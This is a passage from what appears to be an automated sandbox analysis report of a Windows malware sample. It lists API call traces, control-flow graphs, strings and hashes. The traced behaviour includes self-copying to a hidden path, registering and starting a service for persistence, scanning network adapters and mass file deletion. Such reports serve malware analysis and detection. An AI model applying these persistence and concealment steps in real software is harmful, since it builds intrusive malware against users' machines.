                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(C:\whfkpbh\amdrhfskpcu.exe,00000080), ref: 00149E88
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,C:\whfkpbh\amdrhfskpcu.exe,00000000), ref: 00149EA6
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(C:\whfkpbh\amdrhfskpcu.exe,00000002), ref: 00149EC5
                                                                                                                                                                                                              • Part of subcall function 00150500: OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00150537
                                                                                                                                                                                                              • Part of subcall function 00150500: CreateServiceA.ADVAPI32(00000000,0113E608,0113E608,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00150596
                                                                                                                                                                                                              • Part of subcall function 00150500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00150615
                                                                                                                                                                                                              • Part of subcall function 00150500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015062A
                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 0014A26A
                                                                                                                                                                                                            • Sleep.KERNEL32(0000C350), ref: 0014A327
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$BuffChangeCharCloseConfig2CountEnvironmentExitFirstHandleLowerManagerMessageOpenProcessProcess32SnapshotStartStartupSystemThreadTickToolhelp32VariableVersion__aulldiv
                                                                                                                                                                                                            • String ID: zS$%Tmd$C:\Windows\system32\config\systemprofile$C:\whfkpbh\amdrhfskpcu.exe$wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"$@L$}en
                                                                                                                                                                                                            • API String ID: 256806839-120791303
                                                                                                                                                                                                            • Opcode ID: 369658b6b367a4ced69129a6b9e3043cdf76c79c11a1e1c72fbc263f7454970b
                                                                                                                                                                                                            • Instruction ID: e3293a6eb730aeb8f51adb720d26d57176b8f05384c9608a1d62fc2f8fe7eafc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 369658b6b367a4ced69129a6b9e3043cdf76c79c11a1e1c72fbc263f7454970b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F22358B1A00301DFD304EF64FC8AA663BB4FB98301B51461AE54697EB5EB708AE5CF51
                                                                                                                                                                                                            Function 00155200 Relevance: 30.9, APIs: 12, Strings: 5, Instructions: 1106fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 492 155200-15528c call 170a20 495 1552b2-155338 GetVersionExA call 14b7a0 call 14fbc0 492->495 496 15528e-1552ac 492->496 501 15533e-155397 call 14f0d0 495->501 502 155598-155602 495->502 496->495 508 155399-1553a5 501->508 509 1553ab-155405 501->509 504 155604-155626 502->504 505 15562d-1556d0 call 142f90 call 14d530 call 151bb0 call 14d670 call 14def0 call 151d90 502->505 504->505 535 1556d6-15575b DeleteFileA RemoveDirectoryA 505->535 536 15575d 505->536 508->509 511 155407-155419 509->511 512 15541f-155446 call 14c580 509->512 511->512 518 155496-1554b6 CreateDirectoryA call 142f90 512->518 519 155448-155482 512->519 525 1554bb-15554d call 14c580 call 151bb0 518->525 519->518 522 155484-155490 519->522 522->518 525->505 534 155553-155564 525->534 537 155575-155593 534->537 538 155566-155570 534->538 539 155760-1557c9 call 14f0d0 535->539 536->539 537->505 538->505 542 15580c-155883 call 14c580 CreateDirectoryA call 1413e0 539->542 543 1557cb-1557e0 539->543 550 155885-1558a3 542->550 551 1558ad-155915 call 14e430 CreateDirectoryA 542->551 544 155802 543->544 545 1557e2-155800 543->545 544->542 545->542 550->551 554 155917 551->554 555 155921-155964 call 142f90 551->555 554->555 558 155966-155975 555->558 559 15597b-1559af call 14c580 555->559 558->559 562 1559c5-1559d7 559->562 563 1559b1-1559c3 559->563 564 1559dd-155a35 call 142f90 call 151bb0 562->564 563->564 569 155a37-155a58 564->569 570 155a5a-155a67 564->570 571 155a6e-155a8b call 14d530 569->571 570->571 574 155aa2-155adc call 151bb0 call 14d670 call 14def0 call 151d90 571->574 575 155a8d-155a9b 571->575 584 1564f5-15650b 574->584 585 155ae2-155b01 574->585 575->574 588 15650d-156517 584->588 589 156519-156537 584->589 586 155b07-155b75 call 142f90 call 175820 585->586 587 155c42-155cec call 142f90 call 175820 call 151bb0 585->587 605 155b97-155bd0 call 151bb0 586->605 606 155b77-155b90 586->606 611 155d0e 587->611 612 155cee-155d0c 587->612 590 15653d-15657c call 14e430 SetFileAttributesA 588->590 589->590 599 15659c-1565ce call 16a7e0 call 14e310 590->599 600 15657e-156596 590->600 600->599 616 155bd2-155be4 605->616 617 155c1f-155c3d 605->617 606->605 615 155d10-155db5 call 14c580 CreateDirectoryA call 1413e0 611->615 612->615 623 155db7-155de6 615->623 624 155e1c-155e37 615->624 616->615 618 155bea-155c1a 616->618 617->615 618->615 625 155e08-155e1a 623->625 626 155de8-155e06 623->626 627 155e43-155ec2 call 14e430 CreateDirectoryA call 142f90 624->627 628 155e39 624->628 625->627 626->627 633 155ed4-155f12 call 14c580 627->633 634 155ec4-155ecf 627->634 628->627 637 155f14-155f2a 633->637 638 155f40-155fa0 call 142f90 call 151bb0 call 14d530 633->638 634->633 637->638 640 155f2c-155f39 637->640 646 155fc7-156007 call 151bb0 call 14d670 call 14def0 call 151d90 638->646 647 155fa2-155fbb 638->647 640->638 657 1564e1-1564ee 646->657 658 15600d-15606b GetTempPathA call 14d500 646->658 647->646 648 155fbd 647->648 648->646 657->584 661 156071-15607d 658->661 662 156169-1561ea call 1413e0 call 14e430 658->662 664 156092-15609a 661->664 665 15607f-15608c 661->665 677 1561f6-156217 CreateDirectoryA 662->677 678 1561ec 662->678 667 15609c-1560b4 664->667 668 1560da-1560fe 664->668 665->664 670 1560b6-1560c9 667->670 671 1560d0-1560d3 667->671 672 156100 668->672 673 15610a-15615d 668->673 670->671 671->661 675 1560d5 671->675 672->673 673->662 676 15615f 673->676 675->662 676->662 679 156219-156225 677->679 680 15622b-1562db call 142f90 call 14c580 call 142f90 677->680 678->677 679->680 687 1562dd-1562ee 680->687 688 1562fa-156342 call 151bb0 680->688 687->688 689 1562f0 687->689 692 156344-156351 688->692 693 156357-1563ba call 14d530 call 151bb0 call 14d670 call 14def0 call 151d90 688->693 689->688 692->693 704 1564a5-1564db 693->704 705 1563c0-156441 GetTempPathA call 1413e0 call 142f90 693->705 704->657 710 156455-15649e call 14c580 call 151bb0 705->710 711 156443-15644f 705->711 710->704 711->710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(001CAE70), ref: 001552CC
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 0015549F
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?,?,?,?,?,?,00000000), ref: 001556FE
                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00000000,?,?,?,?,?,00000000), ref: 00155743
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0015583A
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001558F3
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00155D71
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00155E82
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000000), ref: 00156029
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 001561FF
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000000), ref: 001563DE
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000002,?,?,?,?,?,?,00000000), ref: 0015655F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
                                                                                                                                                                                                            • String ID: C:\Windows\system32\config\systemprofile$C:\whfkpbh\$\$aE'P$r9:
                                                                                                                                                                                                            • API String ID: 1691758827-2593203275
                                                                                                                                                                                                            • Opcode ID: dc9f98b22f666bbcf108a18948fa63c92f78fdf39cd281546a33d22608c74b73
                                                                                                                                                                                                            • Instruction ID: 1f69f77ae9c2a9888138bc1b0f7bbbd8c8c650dcf00358e654a38ae4449ba2f0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc9f98b22f666bbcf108a18948fa63c92f78fdf39cd281546a33d22608c74b73
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FA26BB2A00205DFC704DF24FC96AA53BB5FBA4311B518219E94297EB5FB308AD5CF91
                                                                                                                                                                                                            Function 00160D80 Relevance: 25.7, APIs: 11, Strings: 3, Instructions: 1222COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/$U][v
                                                                                                                                                                                                            • API String ID: 0-1996962770
                                                                                                                                                                                                            • Opcode ID: a457eeb441ef02acbbd4f9f617d531920dcb212b0b411580e480863b52f9d365
                                                                                                                                                                                                            • Instruction ID: 90313c74ff47ac2c4b629f26429c197e08e3fbfd281e0d3b7a6a192a629c6b15
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a457eeb441ef02acbbd4f9f617d531920dcb212b0b411580e480863b52f9d365
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4B25671A00204DFD709EF64FC95AB93BB5FBA4300B55425AE44697EB4EB308AE5CF81
                                                                                                                                                                                                            Function 0015A930 Relevance: 25.3, APIs: 13, Strings: 1, Instructions: 829memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 999 15a930-15a996 1000 15a9b4-15aae9 call 142f90 call 1413e0 call 151bb0 GetProcessHeap 999->1000 1001 15a998-15a9ad 999->1001 1008 15ab54-15abaf call 142f90 LoadLibraryA 1000->1008 1009 15aaeb-15aafd 1000->1009 1001->1000 1016 15abb1-15abbd 1008->1016 1017 15abc3-15abf4 call 151bb0 1008->1017 1010 15ab12-15ab2c 1009->1010 1011 15aaff-15ab11 1009->1011 1013 15ab41-15ab53 1010->1013 1014 15ab2e-15ab40 1010->1014 1016->1017 1020 15abf6-15ac0d 1017->1020 1021 15ac53-15ac6d 1017->1021 1024 15ac0f-15ac2a 1020->1024 1025 15ac2b-15ac3b 1020->1025 1022 15ac83 1021->1022 1023 15ac6f-15ac81 1021->1023 1026 15ac8d-15acee call 142f90 GetProcAddress call 151bb0 1022->1026 1023->1026 1027 15ac3d-15ac44 1025->1027 1028 15ac4a-15ac52 1025->1028 1033 15acf0-15ad27 FreeLibrary 1026->1033 1034 15ad28-15ad76 HeapAlloc 1026->1034 1027->1028 1035 15ad8c-15ad9a 1034->1035 1036 15ad78-15ad8a 1034->1036 1037 15ada0-15ada2 1035->1037 1036->1037 1038 15ada4-15adc8 1037->1038 1039 15adfa-15ae2a GetAdaptersInfo 1037->1039 1042 15add4-15adf9 FreeLibrary 1038->1042 1043 15adca 1038->1043 1040 15ae30-15ae75 HeapFree 1039->1040 1041 15af4b 1039->1041 1044 15ae77-15ae84 1040->1044 1045 15ae8a-15aea8 HeapAlloc 1040->1045 1046 15af50-15af6e 1041->1046 1043->1042 1044->1045 1047 15af24-15af49 1045->1047 1048 15aeaa-15aedd FreeLibrary 1045->1048 1049 15af70-15af7d 1046->1049 1050 15af83-15af9e GetAdaptersInfo 1046->1050 1047->1046 1051 15af11-15af23 1048->1051 1052 15aedf-15af10 1048->1052 1049->1050 1053 15afa4-15afe6 1050->1053 1054 15b6a3 1050->1054 1056 15aff2-15b060 call 142f90 call 1413e0 1053->1056 1057 15afe8 1053->1057 1055 15b6ad-15b71d HeapFree FreeLibrary 1054->1055 1062 15b062 1056->1062 1063 15b06c-15b0ad call 151bb0 1056->1063 1057->1056 1062->1063 1066 15b0b3-15b0e0 call 16b260 1063->1066 1069 15b1e5-15b21d 1066->1069 1070 15b0e6-15b125 call 16b260 1066->1070 1071 15b223-15b225 1069->1071 1076 15b127-15b141 1070->1076 1077 15b143-15b157 1070->1077 1071->1066 1073 15b22b-15b22e 1071->1073 1075 15b659-15b6a1 call 16a7e0 1073->1075 1075->1055 1079 15b15d-15b15f 1076->1079 1077->1079 1080 15b161-15b1b2 1079->1080 1081 15b1d3-15b1df 1079->1081 1083 15b1b4 1080->1083 1084 15b1be-15b1c5 1080->1084 1081->1069 1083->1084 1085 15b1c7-15b1d1 1084->1085 1086 15b233-15b274 call 142f90 1084->1086 1085->1071 1089 15b276-15b294 1086->1089 1090 15b29a-15b2d1 call 1413e0 call 151bb0 1086->1090 1089->1090 1095 15b2d3-15b2dd 1090->1095 1096 15b2df-15b2fe 1090->1096 1097 15b30a-15b31e 1095->1097 1096->1097 1098 15b300 1096->1098 1099 15b395 1097->1099 1100 15b320-15b360 1097->1100 1098->1097 1103 15b397-15b39e 1099->1103 1101 15b362-15b376 1100->1101 1102 15b378-15b393 1100->1102 1101->1103 1102->1103 1104 15b3a4-15b402 1103->1104 1105 15b5d1-15b656 call 16a7e0 1103->1105 1106 15b404-15b41c 1104->1106 1107 15b43d-15b4b0 1104->1107 1105->1075 1106->1107 1109 15b41e-15b437 1106->1109 1111 15b4b2-15b4bc 1107->1111 1112 15b4be-15b4ea 1107->1112 1109->1107 1114 15b50a-15b510 1111->1114 1113 15b4ec-15b504 1112->1113 1112->1114 1113->1114 1115 15b517-15b530 1114->1115 1116 15b512-15b516 1114->1116 1117 15b532-15b541 1115->1117 1118 15b579-15b592 1115->1118 1116->1115 1119 15b561-15b577 1117->1119 1120 15b543-15b55f 1117->1120 1121 15b598-15b5c8 1118->1121 1119->1121 1120->1121 1121->1104 1122 15b5ce 1121->1122 1122->1105
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                            • String ID: #~\
                                                                                                                                                                                                            • API String ID: 54951025-95464956
                                                                                                                                                                                                            • Opcode ID: 78b4514fca032ac38f2048c54f6be1c7d5ae35206958cb6b6a394fc72ff63e13
                                                                                                                                                                                                            • Instruction ID: f5e059731d034deb7662b2b573f59cf7ee5e479a09cbcd0b11f0d708ed3ccc74
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78b4514fca032ac38f2048c54f6be1c7d5ae35206958cb6b6a394fc72ff63e13
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58720E76A04205CFC304DF65FC866A53BF5FB98312B51421AE845DBEB0EB708AE5CB91
                                                                                                                                                                                                            Function 00169580 Relevance: 7.7, APIs: 5, Instructions: 220filesleepCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1142 169580-1695a3 1143 169963-169966 1142->1143 1144 1695a9-1695d1 1142->1144 1145 1695d3 1144->1145 1146 1695dd-1695f2 1144->1146 1145->1146 1147 1695f4 1146->1147 1148 1695fe-169707 call 152a20 call 14d500 Sleep call 14c580 call 142f90 1146->1148 1147->1148 1157 169731-169747 1148->1157 1158 169709-169721 1148->1158 1160 16974d-169773 call 14c580 1157->1160 1159 169723-16972f 1158->1159 1158->1160 1159->1160 1163 169795-1697d4 call 151bb0 FindFirstFileA 1160->1163 1164 169775-16978f 1160->1164 1167 1697d6-169802 1163->1167 1168 169808-16980a 1163->1168 1164->1163 1167->1168 1169 169902-169962 call 16a7e0 1168->1169 1170 169810-16982b 1168->1170 1169->1143 1172 169830-16985c 1170->1172 1173 169864-1698d3 call 14c580 DeleteFileA FindNextFileA 1172->1173 1174 16985e 1172->1174 1173->1172 1178 1698d9-1698fb FindClose 1173->1178 1174->1173 1178->1169
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNELBASE(000003E8,00000001), ref: 00169679
                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,?), ref: 001697B8
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 001698A9
                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,?), ref: 001698CB
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 001698E4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteFirstNextSleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1528862845-0
                                                                                                                                                                                                            • Opcode ID: c949ea3f2e6a2350f6bf94a409c1f545a5a5e425c8513c22f02f1df68cce28f4
                                                                                                                                                                                                            • Instruction ID: 4b7ec12d77ae79b803ec06132f6e0ec141d2224b252409d7c9888dc2bb5e892e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c949ea3f2e6a2350f6bf94a409c1f545a5a5e425c8513c22f02f1df68cce28f4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3914375901205DFC714DF34FC86AA53BB9FB98704B40861AE94687E70EB348AE1CF91
                                                                                                                                                                                                            Function 001622A0 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 598sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1488 1622a0-1622f9 1489 162307-16244a call 170a20 * 2 1488->1489 1490 1622fb-162300 1488->1490 1495 16246c-162476 1489->1495 1496 16244c-16246a 1489->1496 1490->1489 1497 162478-1624a9 call 1750e0 call 1700c0 1495->1497 1496->1497 1502 1624bd-16257c call 169580 call 14e430 call 142f90 call 14c580 call 151bb0 1497->1502 1503 1624ab-1624b7 1497->1503 1514 162580-162609 call 1708b0 call 151200 1502->1514 1503->1502 1519 16260f 1514->1519 1520 162bca 1514->1520 1522 162611-162613 1519->1522 1523 162619-16262b 1519->1523 1521 162bcc-162c69 call 15d990 Sleep call 158cf0 call 152120 1520->1521 1536 162c6e-162c73 1521->1536 1522->1520 1522->1523 1524 162652-162662 1523->1524 1525 16262d-162650 1523->1525 1527 162668-1626a0 1524->1527 1525->1527 1530 1626a2 1527->1530 1531 1626ac-162722 call 14b620 1527->1531 1530->1531 1537 162bae-162bc8 1531->1537 1538 162728 1531->1538 1539 162d0d-162d3f 1536->1539 1540 162c79-162c8f 1536->1540 1537->1521 1541 162735-16274d 1538->1541 1539->1514 1542 162c91-162c9b 1540->1542 1543 162c9d-162cad 1540->1543 1544 16274f-16275b 1541->1544 1545 16276d-162791 call 1708b0 1541->1545 1546 162cb3-162cbb 1542->1546 1543->1546 1544->1545 1547 16275d-162767 1544->1547 1553 162793-1627a7 1545->1553 1554 1627ad-1627bc 1545->1554 1549 162ced-162d07 1546->1549 1550 162cbd-162ce6 call 16fa80 1546->1550 1547->1545 1549->1539 1550->1549 1553->1554 1555 162815-162873 call 164af0 call 142f90 call 160d80 1554->1555 1556 1627be 1554->1556 1567 162878-16290d call 151bb0 call 14d760 call 15d0f0 1555->1567 1558 1627c5-162812 call 151200 1556->1558 1559 1627c0-1627c3 1556->1559 1558->1555 1559->1555 1559->1558 1574 16290f 1567->1574 1575 162919-16291c 1567->1575 1574->1575 1576 162922-162956 call 142f90 1575->1576 1577 162b43-162b7f call 16a7e0 1575->1577 1582 16296b-162ad5 call 14d530 call 151bb0 call 171050 call 152c30 call 15c770 call 171050 call 14e310 call 142f90 call 160d80 call 151bb0 call 14d760 1576->1582 1583 162958-162965 1576->1583 1584 162ba4 1577->1584 1585 162b81-162b9c 1577->1585 1610 162b16-162b3d call 15d0f0 1582->1610 1611 162ad7-162b00 1582->1611 1583->1582 1584->1537 1586 162ba2 1585->1586 1587 162730 1585->1587 1586->1537 1587->1541 1610->1577 1611->1610 1612 162b02-162b0f 1611->1612 1612->1610
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 001708B0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,0016247D), ref: 00170929
                                                                                                                                                                                                              • Part of subcall function 001708B0: __aulldiv.LIBCMT ref: 00170953
                                                                                                                                                                                                              • Part of subcall function 00151200: Sleep.KERNELBASE(000003E8,?,?,001625B4,?,00000708,00000000), ref: 0015139B
                                                                                                                                                                                                            • Sleep.KERNELBASE(000008AE), ref: 00162C03
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • C:\whfkpbh\amdrhfskpcu.exe, xrefs: 00162CCC
                                                                                                                                                                                                            • wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe", xrefs: 00162CC7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
